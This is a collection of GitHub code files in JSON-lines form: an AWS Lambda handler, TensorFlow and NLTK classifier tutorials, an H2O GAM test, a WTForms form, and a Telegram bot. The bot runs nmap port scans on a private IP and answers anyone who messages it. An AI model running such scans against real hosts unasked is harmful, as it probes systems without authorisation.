+{"seq_id": "40824369572", "text": "import os\nimport datetime\nimport json\nimport sys\nsys.path.append(\"/opt/\")\nimport boto3\n\nstepfunctions_client = boto3.client(\"stepfunctions\")\n\n\ndef lambda_handler(event, context):\n print(event)\n\n taskToken = event[\"Details\"][\"ContactData\"][\"Attributes\"][\"taskToken\"]\n message = event[\"Details\"][\"ContactData\"][\"Attributes\"]\n message[\"response_intent\"] = event[\"Details\"][\"Parameters\"][\n \"response_intent\"]\n message[\"error\"] = \"null\"\n\n if \"intent_answer\" in message and message[\"intent_answer\"] is not \"\":\n message[\"answer\"] = message[\"intent_answer\"]\n answer = message[\"intent_answer\"]\n else:\n answer = message[\"response_intent\"].replace(\"CalloutBot_\",\n \"\").replace(\"Intent\", \"\")\n message[\"answer\"] = answer\n\n message[\"intent_answer\"] = \"\"\n\n previous_answer = json.loads(message[\"answers\"])\n previous_answer.append(answer)\n message[\"answers\"] = json.dumps(previous_answer)\n\n return message\n", "repo_name": "wongcyrus/callouts", "sub_path": "call_out/response_handler.py", "file_name": "response_handler.py", "file_ext": "py", "file_size_in_byte": 1011, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.append", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "boto3.client", "line_number": 8, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 30, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}]} 
+{"seq_id": "9696531608", "text": "\"\"\"project3.\"\"\"\r\nimport logging\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport math\r\nimport tensorflow as tf\r\n\r\n# Import TensorFlow Datasets\r\nimport tensorflow_datasets as tfds\r\n\r\ntfds.disable_progress_bar()\r\nlogger = tf.get_logger()\r\nlogger.setLevel(logging.ERROR)\r\n\r\n# loading daata\r\ndataset, metadata = tfds.load('fashion_mnist', as_supervised=True,\r\n with_info=True)\r\n# naming data, thoough I wonder why?\r\ntrain_dataset = dataset['train']\r\ntest_dataset = dataset['test']\r\n\r\n\"\"\"\r\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\r\n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\r\n\"\"\"\r\nclass_names = metadata.features['label'].names\r\n# 60,000 images to train the network and 10,000 images to evaluate\r\nprint(\"Class names: {}\".format(class_names))\r\n\r\nnum_train_examples = metadata.splits['train'].num_examples\r\nnum_test_examples = metadata.splits['test'].num_examples\r\nprint(\"Number of training examples: {}\".format(num_train_examples))\r\nprint(\"Number of test examples: {}\".format(num_test_examples))\r\n\r\n# The value of each pixel in the image data is an integer in the range [0,255].\r\n# For the model to work properly, these values need to be normalized\r\n# to the range [0,1]\r\n\r\n\r\ndef normalize(images, labels):\r\n \"\"\"Normalises a pixel value from 0-255 to 0-1.\"\"\"\r\n images = tf.cast(images, tf.float32)\r\n images /= 255\r\n return images, labels\r\n\r\n\r\n# The map function applies the normalize function to each element in the train\r\n# and test datasets\r\ntrain_dataset = train_dataset.map(normalize)\r\ntest_dataset = test_dataset.map(normalize)\r\n\r\n# The first time you use the dataset, the images will be loaded from disk\r\n# Caching will keep them in memory, making training faster\r\ntrain_dataset = train_dataset.cache()\r\ntest_dataset = test_dataset.cache()\r\n\r\n# Take first 30 images with test_dataset.take(30)\r\n# A crude way of printing imeages 5-30\r\nplt.figure(figsize=(10, 10))\r\ni = 0\r\ninitial = 5 # initial image to plot\r\nfor (image, label) in test_dataset.take(30):\r\n if i >= initial:\r\n image = image.numpy().reshape((28, 28))\r\n plt.subplot(5, 5, i-initial+1)\r\n plt.xticks([])\r\n plt.yticks([])\r\n plt.grid(False)\r\n plt.imshow(image, cmap=plt.cm.binary)\r\n plt.xlabel(class_names[label])\r\n i += 1\r\nplt.show()\r\n\r\n# General info about lists in Python\r\n\"\"\"\r\nL[a], L[b] = L[b], L[a] if shifting is needed\r\nmore information about shifting objects in lists via the link:\r\nhttps://coderoad.ru/39167057/%D0%9B%D1%83%D1%87%D1%88%D0%B8%D0\r\n%B9-%D1%81%D0%BF%D0%BE%D1%81%D0%BE%D0%B1-%D0%BF%D0%BE%D0%BC%D0\r\n%B5%D0%BD%D1%8F%D1%82%D1%8C-%D0%BC%D0%B5%D1%81%D1%82%D0%B0%D0%\r\nBC%D0%B8-%D1%8D%D0%BB%D0%B5%D0%BC%D0%B5%D0%BD%D1%82%D1%8B-%D0%\r\nB2-%D1%81%D0%BF%D0%B8%D1%81%D0%BA%D0%B5 \"\"\"\r\n# Creatung a model-layers part\r\n\"\"\" Creating the list of layers, starting with layer 0.\r\nTHE ORDER DOES METTER!!!\r\nAdding new layers in the end of existing list \"\"\"\r\n\r\nlayers = [tf.keras.layers.Conv2D(filters=32, kernel_size=(3, 3),\r\n padding='same', activation=tf.nn.relu,\r\n input_shape=(28, 28, 1))]\r\n# this layer creates 32 convoluted images 28x28 pixels: 1 image for each filter\r\n# (overall 28*28*32=25088 nodes)\r\n# obtained by applying 3x3 filter --> the values in the filter are changing during training\r\n# so to minimize the loss function\r\n# more info: 
https://www.tensorflow.org/api_docs/python/tf/keras/layers/Conv2D\r\n\r\nlayers.append(tf.keras.layers.MaxPooling2D(pool_size=(2, 2),\r\n strides=2))\r\n# MaxPooling = reducing the size of the image; applying 2x2 frame\r\n# Taking the maximum value from the frame and putting it into the new image\r\n# shifting the frame by 2 (strides = n means strides = (n, n));\r\n# overall 28/2*28/2*32=25088/4=6272 nodes in 32 batches\r\n\r\nlayers.append(tf.keras.layers.Conv2D(64, (3, 3), padding='same',\r\n activation=tf.nn.relu))\r\n# the same as 1st, but now it is 14*14*64=12544 nodes in 64 batches\r\n\r\nlayers.append(tf.keras.layers.MaxPooling2D((2, 2), strides=2))\r\n# the same as 2nd, 14/2*14/2*64=3136 nodes; 7*7 nodes in 64 batches\r\n\r\nlayers.append(tf.keras.layers.Flatten())\r\n# flattens the last layer\r\n\r\nlayers.append(tf.keras.layers.Dense(128, activation=tf.nn.relu))\r\n# add the layer with 128 nodes operating by relu rule\r\nlayers.append(tf.keras.layers.Dense(10, activation=tf.nn.softmax))\r\n\r\n# the list of layers above is the argument in Sequential\r\nmodel = tf.keras.Sequential(layers)\r\n\r\n# Compilation of the model\r\nmodel.compile(optimizer='adam',\r\n loss=tf.keras.losses.SparseCategoricalCrossentropy(),\r\n metrics=['accuracy'])\r\n\r\nBATCH_SIZE = 32\r\n# .batch(BATCH_SIZE) tells model.fit to use batches of BATCH_SIZE\r\n# images and labels when updating the model variables\r\n# .shuffle(num_train_examples) randomizes the order of train_examples\r\n# .repeat() makes it repeat forever, until the number of epochs is reached\r\n# .cache() uploads dataset into cache\r\n# the order of .functions applied to the dataset object seems\r\n# does not matter, except should end by cache().repeat() or .cache()\r\ntrain_dataset = train_dataset.shuffle(num_train_examples).batch(\r\n BATCH_SIZE).cache().repeat()\r\ntest_dataset = test_dataset.batch(BATCH_SIZE).cache()\r\n\r\n# TRAINING THE MODEL\r\n# epoch - the number of uses of the whole dataset\r\n# steps_per_epoch - the number of changes of batches (must be integer)\r\nmodel.fit(train_dataset, epochs=10,\r\n steps_per_epoch=math.ceil(num_train_examples/BATCH_SIZE))\r\n\r\n# EVALUATION OF THE MODEL\r\ntest_loss, test_accuracy = model.evaluate(test_dataset, steps=math.\r\n ceil(num_test_examples/32))\r\nprint('Accuracy on test dataset:', test_accuracy)\r\n\r\nnumber_of_batch = 1 # the number of batch we take, starting with 1\r\nfor test_images, test_labels in test_dataset.take(number_of_batch):\r\n test_images = test_images.numpy() # .numpy() converts a Tensor\r\n test_labels = test_labels.numpy() # to a Numpy array, so images and\r\n predictions = model.predict(x=test_images, batch_size=BATCH_SIZE)\r\n# labels are arrays now\r\n# it seems not necessary, because model.predict can work with tensors\r\n# but maybe it is used later somewhere\r\n# model.predict returns the numpy array of predictions\r\n\r\nprint(predictions.shape) # printing tuple of array dimensions (tuple==cortege)\r\n# should be 32x10, 32 = batch size times 10 predictions for each image\r\n\r\nprint(predictions[2]) # printing the distribution of predictions' probabilities\r\n# for image number 2 in batch number 1\r\n\r\nprint(np.argmax(predictions[2])) # printing the number of the array\r\n# with the maximum value among the predictions\r\nprint(test_labels[2]) # the same for labels\r\nprint(class_names[test_labels[2]]) # printing the name of the label\r\n\r\n\r\ndef plot_image(i, predictions_array, true_labels, images):\r\n \"\"\"Plots the image.\"\"\"\r\n predictions_array, 
true_label, img = predictions_array[i], true_labels[i], images[i]\r\n plt.grid(False)\r\n plt.xticks([])\r\n plt.yticks([])\r\n plt.imshow(img[..., 0], cmap=plt.cm.binary)\r\n predicted_label = np.argmax(predictions_array)\r\n if predicted_label == true_label:\r\n color = 'blue'\r\n else:\r\n color = 'red'\r\n plt.xlabel(\"{} {:2.0f}% ({})\".format(class_names[predicted_label],\r\n 100*np.max(predictions_array),\r\n class_names[true_label]),\r\n color=color)\r\n\r\n\r\ndef plot_value_array(i, predictions_array, true_label):\r\n \"\"\"Plots the probability bar chart.\"\"\"\r\n predictions_array, true_label = predictions_array[i], true_label[i]\r\n plt.grid(False)\r\n plt.xticks([])\r\n plt.yticks([])\r\n thisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\r\n plt.ylim([0, 1])\r\n predicted_label = np.argmax(predictions_array)\r\n thisplot[predicted_label].set_color('red')\r\n thisplot[true_label].set_color('blue')\r\n\r\n\r\n# drawing 0th image:\r\ni = 0\r\nplt.figure(figsize=(6, 3))\r\nplt.subplot(1, 2, 1)\r\nplot_image(i, predictions, test_labels, test_images)\r\nplt.subplot(1, 2, 2)\r\nplot_value_array(i, predictions, test_labels)\r\n\r\n# drawing 12th image:\r\ni = 12\r\nplt.figure(figsize=(6, 3))\r\nplt.subplot(1, 2, 1)\r\nplot_image(i, predictions, test_labels, test_images)\r\nplt.subplot(1, 2, 2)\r\nplot_value_array(i, predictions, test_labels)\r\n\r\n# Plot the X test images after the shift, their predicted label,\r\n# and the true label\r\n# Color correct predictions in blue, incorrect predictions in red\r\nnum_rows = 5\r\nnum_cols = 3\r\nnum_images = num_rows*num_cols\r\nplt.figure(figsize=(2*2*num_cols, 2*num_rows))\r\nshift = 15 # to arrange the shift in image display\r\nfor i in range(num_images):\r\n plt.subplot(num_rows, 2*num_cols, 2*i+1)\r\n plot_image(shift+i, predictions, test_labels, test_images)\r\n plt.subplot(num_rows, 2*num_cols, 2*i+2)\r\n plot_value_array(shift+i, predictions, test_labels)\r\n\r\n# Use the trained model to make a prediction about a single image\r\n\r\n# Grab an image from the test dataset\r\nimg = test_images[0]\r\nprint(img.shape)\r\n\r\n# Add the image to a batch where it's the only member.\r\nimg = np.array([img])\r\nprint(img.shape)\r\n\r\n# Predict the image\r\n# model.predict returns a list of lists,\r\n# one for each image in the batch of data\r\npredictions_single = model.predict(img)\r\nprint(predictions_single)\r\n\r\nplot_value_array(0, predictions_single, test_labels)\r\n_ = plt.xticks(range(10), class_names, rotation=45)\r\nprint(np.argmax(predictions_single[0]))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "YuriiNev/TF_studying", "sub_path": "project3_main.py", "file_name": "project3_main.py", "file_ext": "py", "file_size_in_byte": 9647, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tensorflow_datasets.disable_progress_bar", "line_number": 11, "usage_type": "call"}, {"api_name": "tensorflow.get_logger", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.load", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 42, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.subplot", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 69, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 97, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 97, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 104, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 104, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 105, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 108, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 108, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 111, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 111, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 114, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 114, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 114, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 116, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 116, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 116, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 119, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 123, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 123, "usage_type": "attribute"}, {"api_name": "math.ceil", "line_number": 142, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 175, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 177, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 194, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 212, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 249, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 249, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 250, "usage_type": "call"}]} +{"seq_id": "19649001616", "text": "'''\nimport json\n\nimport requests\n\nurl = \"http://127.0.0.1:8889/nlp_words\"\n\ndata = {\"userId\": 1, \"words\": \"我想查话费\"}\n\nresp 
= requests.post(url=url, data=json.dumps(data))\n\nprint(resp.text)\n'''\nimport json\nimport requests\n\nurl = \"http://127.0.0.1:8889/nlp_words\"\n\npayload = {\"userId\": 1, \"words\": \"我想查话费\"}\nheaders = {\n 'content-type': \"application/json\",\n 'cache-control': \"no-cache\",\n 'postman-token': \"4ec2dbd7-8da8-69b3-058a-8eb536557db0\"\n }\n\nresponse = requests.request(\"POST\", url, data=json.dumps(payload), headers=headers)\n\nprint(json.loads(response.text))\n\n\n", "repo_name": "aaaasule/zndhjqr", "sub_path": "test/test_middleware.py", "file_name": "test_middleware.py", "file_ext": "py", "file_size_in_byte": 594, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.request", "line_number": 26, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 26, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "28409984669", "text": "import nltk\nimport numpy\nfrom nltk.classify.scikitlearn import SklearnClassifier\nfrom nltk.corpus import movie_reviews\nimport random\nfrom sklearn.naive_bayes import MultinomialNB,GaussianNB,BernoulliNB\nimport pickle\n\n\ndocument=[(list(movie_reviews.words(fileid)),category)\n for category in movie_reviews.categories()\n for fileid in movie_reviews.fileids(category)]\nrandom.shuffle(document)\nall_words=[]\nfor w in movie_reviews.words():\n all_words.append(w.lower())\nall_words=nltk.FreqDist(all_words)\nword_feature=list(all_words)[:3000]\n\ndef find_feature(documents):\n words=set(documents)\n feature={}\n for w in word_feature:\n feature[w]=(w in words)\n return feature\nprint((find_feature(movie_reviews.words('neg/cv000_29416.txt'))))\nfeatures=[(find_feature(rev),category) for(rev,category) in document]\n\ntraining_Set=features[:1900]\ntest_set=features[1900:]\nclassifier=nltk.NaiveBayesClassifier.train(training_Set)\nprint(\"naive bayes accuracy\",(nltk.classify.accuracy(classifier,test_set))*100)\n", "repo_name": "sardarr/Pyhthon_NLP_Tutorial", "sub_path": "movie_reviews.py", "file_name": "movie_reviews.py", "file_ext": "py", "file_size_in_byte": 1032, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "nltk.corpus.movie_reviews.words", "line_number": 10, "usage_type": "call"}, {"api_name": "nltk.corpus.movie_reviews", "line_number": 10, "usage_type": "name"}, {"api_name": "nltk.corpus.movie_reviews.categories", "line_number": 11, "usage_type": "call"}, {"api_name": "nltk.corpus.movie_reviews", "line_number": 11, "usage_type": "name"}, {"api_name": "nltk.corpus.movie_reviews.fileids", "line_number": 12, "usage_type": "call"}, {"api_name": "nltk.corpus.movie_reviews", "line_number": 12, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 13, "usage_type": "call"}, {"api_name": "nltk.corpus.movie_reviews.words", "line_number": 15, "usage_type": "call"}, {"api_name": "nltk.corpus.movie_reviews", "line_number": 15, "usage_type": "name"}, {"api_name": "nltk.FreqDist", "line_number": 17, "usage_type": "call"}, {"api_name": "nltk.corpus.movie_reviews.words", "line_number": 26, "usage_type": "call"}, {"api_name": "nltk.corpus.movie_reviews", "line_number": 26, "usage_type": "name"}, {"api_name": "nltk.NaiveBayesClassifier.train", "line_number": 31, "usage_type": "call"}, {"api_name": "nltk.NaiveBayesClassifier", "line_number": 31, "usage_type": "attribute"}, {"api_name": "nltk.classify.accuracy", 
"line_number": 32, "usage_type": "call"}, {"api_name": "nltk.classify", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "958158134", "text": "# Echo\nimport nmap\nfrom telegram.ext import Updater, CommandHandler\n\nupdater = Updater(token=\"fffffffffffff\")\ndispatcher = updater.dispatcher\n\n\ndef command(bot, update):\n bot.send_message(chat_id=update.message.chat_id, text=\"/scanports \\n /checkstatus\")\nstart_handler = CommandHandler(\"command\", command)\ndispatcher.add_handler(start_handler)\n\n\ndef scanports(bot, update):\n nm = nmap.PortScanner()\n scan_range = nm.scan(hosts=\"192.168.0.104\")\n data = scan_range['scan']\n print(data)\n bot.send_message(chat_id=update.message.chat_id, text=data)\nscanports_handler = CommandHandler(\"scanports\", scanports)\ndispatcher.add_handler(scanports_handler)\n\n\n\ndef checkstatus(bot, update):\n nm = nmap.PortScanner()\n scan_range = nm.scan('192.168.0.104', '21-443')\n for host in nm.all_hosts():\n print('Host : %s' % (host))\n print('State : %s' % nm[host].state())\n bot.send_message(chat_id=update.message.chat_id, text='Host : 192.168.0.104' + ' => ' + nm[host].state())\ncheckstatus_handler = CommandHandler(\"checkstatus\", checkstatus)\ndispatcher.add_handler(checkstatus_handler)\n\n\nupdater.start_polling()\n\n", "repo_name": "muhammedessa/python_telegram", "sub_path": "pythonTelegram/main6.py", "file_name": "main6.py", "file_ext": "py", "file_size_in_byte": 1140, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "61", "api": [{"api_name": "telegram.ext.Updater", "line_number": 5, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 11, "usage_type": "call"}, {"api_name": "nmap.PortScanner", "line_number": 16, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 21, "usage_type": "call"}, {"api_name": "nmap.PortScanner", "line_number": 27, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "13348195854", "text": "import sys\nsys.path.insert(1, \"../../../\")\nimport h2o\nfrom tests import pyunit_utils\nfrom h2o.estimators.gam import H2OGeneralizedAdditiveEstimator\nimport random\n\n# In this test, I will test all the following cross-validation parameters:\n# 1. fold_assignment = random\n# 2. keep_cross_validation_model\n# 3. keep_cross_validation_predictions\n# 4. 
keep_cross_validation_fold_assignment\n# \n# If we keep the cross-validation models and the fold assignment, then the prediction using the folds and\n# the predictions kept from cross-validation should yield the same result!\ndef test_gam_model_predict():\n print(\"Checking cross validation for GAM binomial\")\n print(\"Preparing for data....\")\n h2o_data = h2o.import_file(pyunit_utils.locate(\"smalldata/glm_test/binomial_20_cols_10KRows.csv\"))\n h2o_data[\"C1\"] = h2o_data[\"C1\"].asfactor()\n h2o_data[\"C2\"] = h2o_data[\"C2\"].asfactor()\n h2o_data[\"C3\"] = h2o_data[\"C3\"].asfactor()\n h2o_data[\"C4\"] = h2o_data[\"C4\"].asfactor()\n h2o_data[\"C5\"] = h2o_data[\"C5\"].asfactor()\n h2o_data[\"C6\"] = h2o_data[\"C6\"].asfactor()\n h2o_data[\"C7\"] = h2o_data[\"C7\"].asfactor()\n h2o_data[\"C8\"] = h2o_data[\"C8\"].asfactor()\n h2o_data[\"C9\"] = h2o_data[\"C9\"].asfactor()\n h2o_data[\"C10\"] = h2o_data[\"C10\"].asfactor()\n myY = \"C21\"\n h2o_data[\"C21\"] = h2o_data[\"C21\"].asfactor()\n\n nfold = random.randint(3,8)\n h2o_model = H2OGeneralizedAdditiveEstimator(family = 'binomial', gam_columns = [\"C11\", \"C12\", \"C13\", \"C14\"], \n bs = [0, 1, 2, 3],\n nfolds = nfold,\n keep_cross_validation_models = True,\n keep_cross_validation_predictions = True,\n keep_cross_validation_fold_assignment = True,\n fold_assignment = \"random\")\n h2o_model.train(x=list(range(0,20)), y=myY, training_frame=h2o_data)\n xval_models = h2o_model.get_xval_models()\n assert len(xval_models)==nfold, \"expected {0} models but received {1} models\".format(nfold, len(xval_models))\n xval_predictions = h2o_model.cross_validation_holdout_predictions()\n xval_fold_assignments = h2o_model.cross_validation_fold_assignment()\n assert xval_fold_assignments.max() == (nfold-1), \"expected fold_assignment max: {0}, actual max: \" \\\n \"{1}\".format(nfold-1, xval_fold_assignments.max())\n assert xval_predictions.nrow == h2o_data.nrow, \"expected fold_assignment row size: {0}, actual row size: \" \\\n \"{1}\".format(h2o_data.nrow, xval_predictions.nrow)\n\n\n \nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(test_gam_model_predict)\nelse:\n test_gam_model_predict()\n", "repo_name": "h2oai/h2o-3", "sub_path": "h2o-py/tests/testdir_algos/gam/pyunit_PUBDEV_7366_gam_cv_all_params_binomial.py", "file_name": "pyunit_PUBDEV_7366_gam_cv_all_params_binomial.py", "file_ext": "py", "file_size_in_byte": 2877, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6553, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.insert", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "h2o.import_file", "line_number": 19, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.locate", "line_number": 19, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 19, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 33, "usage_type": "call"}, {"api_name": "h2o.estimators.gam.H2OGeneralizedAdditiveEstimator", "line_number": 34, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.standalone_test", "line_number": 54, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "27741560025", "text": "import re\nfrom wtforms import Form, SelectField\nfrom data_explorer.db import query_mysql\n\n\ndef course_form(lang):\n\t\"\"\"Query list of all course codes and their titles as seen\n\tin the LSR. 
Pass to WTForms to make a dropdown menu.\"\"\"\n\tfield_name = 'course_title_{0}'.format(lang)\n\tquery = \"\"\"\n\t\tSELECT a.course_code, a.{0}\n\t\tFROM (\n\t\t\tSELECT DISTINCT course_code, {0}\n\t\t\tFROM lsr_last_year\n\t\t\tUNION\n\t\t\tSELECT DISTINCT course_code, {0}\n\t\t\tFROM lsr_this_year\n\t\t) AS a\n\t\tORDER BY 1 ASC;\n\t\"\"\".format(field_name)\n\tresults = query_mysql(query)\n\t\n\t# SelectField takes list of tuples (pass_value, display_value)\n\tchoices = [(tup[0].upper(), '{0}: {1}'.format(tup[0].upper(), _clean_title(tup[1]))) for tup in results]\n\t\n\tclass CourseForm(Form):\n\t\t# tag removed from 'templates/includes/_formhelpers.html', so pass empty string\n\t\tform_name = ''\n\t\tcourse_code = SelectField(form_name, choices=choices)\n\t\n\treturn CourseForm\n\n\n# Internal func to remove course codes from titles\nregex = re.compile(pattern=r'[(\\[]{0,1}[a-zA-Z]{1}\\d{3}[)\\]]{0,1}')\ndef _clean_title(course_title):\n\t\"\"\"Remove course codes from titles.\"\"\"\n\treturn regex.sub('', course_title).strip()\n", "repo_name": "shalevy1/CSPS-Data-Explorer-Internal", "sub_path": "data_explorer/course_routes/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1152, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "data_explorer.db.query_mysql", "line_number": 21, "usage_type": "call"}, {"api_name": "wtforms.Form", "line_number": 26, "usage_type": "name"}, {"api_name": "wtforms.SelectField", "line_number": 29, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 